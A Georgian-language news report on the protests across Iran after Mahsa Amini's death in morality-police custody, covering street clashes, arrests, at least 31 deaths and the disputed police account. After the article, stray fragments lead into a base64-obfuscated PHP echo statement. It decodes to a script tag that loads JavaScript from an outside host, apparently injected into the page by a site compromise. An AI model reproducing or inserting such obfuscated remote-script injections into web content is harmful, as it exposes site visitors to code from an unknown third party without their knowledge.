celsiusi
ავერსი შნაიდერი

ირანის დედაქალაქ თეირანში მთავრობის მოწინააღმდეგე დემონსტრანტებსა და პოლიციას შორის შეტაკებები მიმდინარეობს. „ბიბისის“ სპარსული ბიუროს ცნობით, თეირანის ერთ-ერთი უბანი ბრძოლის ველს წააგავს.

როგორც მედია იუწყება, დემონსტრაციები უკვე 80-მდე ქალაქში იმართება. უფლებადამცველი ორგანიზაციების ინფორმაციით, ერთი კვირის განმავლობაში მიმდინარე დაპირისპირებას სულ მცირე 31 ადამიანი ემსხვერპლა.

მომიტინგეებმა ნაგვის დიდი კონტეინერები დაწვეს და რამდენიმე ქუჩაზე მოძრაობა გადაკეტეს. გავრცელებული ინფორმაციით, დააკავეს ათობით მომიტინგე. უსაფრთხოების ძალები კარდაკარ დადიან იმ სახლებსა და მაღაზიებში, სადაც ისინი თავს აფარებდნენ. ასევე გავრცელდა ცნობები პოლიციის განყოფილებებისა და სხვა სამთავრობო შენობების დაკავების ან ადგილზე ხანძრის გაჩენის შესახებ.

ყველაზე მასშტაბური არეულობა შეინიშნება ქურთებით დასახლებულ ირანის ჩრდილო-დასავლეთში. აქციის მონაწილეები 22 წლის ეროვნებით ქურთი ქალის, მაჰსა ამინის გარდაცვალებას აპროტესტებენ, რომელიც მორალის პოლიციამ ჰიჯაბის არასწორი ტარებისთვის დააკავა. დაკავების ცენტრში გადაყვანის შემდეგ, მაჰსა ამინს გული წაუვიდა. როგორც მედია წერს, მოგვიანებით გავრცელდა ცნობები, რომ პოლიციამ ირანელი ქალი ხელკეტებით თავში სცემა. პოლიციამ განაცხადა, რომ არ არსებობს რაიმე მტკიცებულება არასათანადო მოპყრობის შესახებ და რომ მას გულის პრობლემა ჰქონდა. მაჰსა ამინის ოჯახი პოლიციის ინფორმაციას კატეგორიულად უარყოფს.

მაჰსა ამინის სიკვდილმა ბევრი ირანელი განარისხა და პირველი საპროტესტო აქცია მისი დაკრძალვის შემდეგ გაიმართა. სოციალურ ქსელებში გავრცელდა კადრები, სადაც ჩანს, როგორ იხსნიან ქალები თავსაბურავს და დემონსტრაციულად იჭრიან თმებს. „სიკვდილი დიქტატორს“ – ყვიროდნენ აქციის მონაწილეები ირანის სულიერი ლიდერის, აიათოლა ალი ხამენეის წინააღმდეგ.

411
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");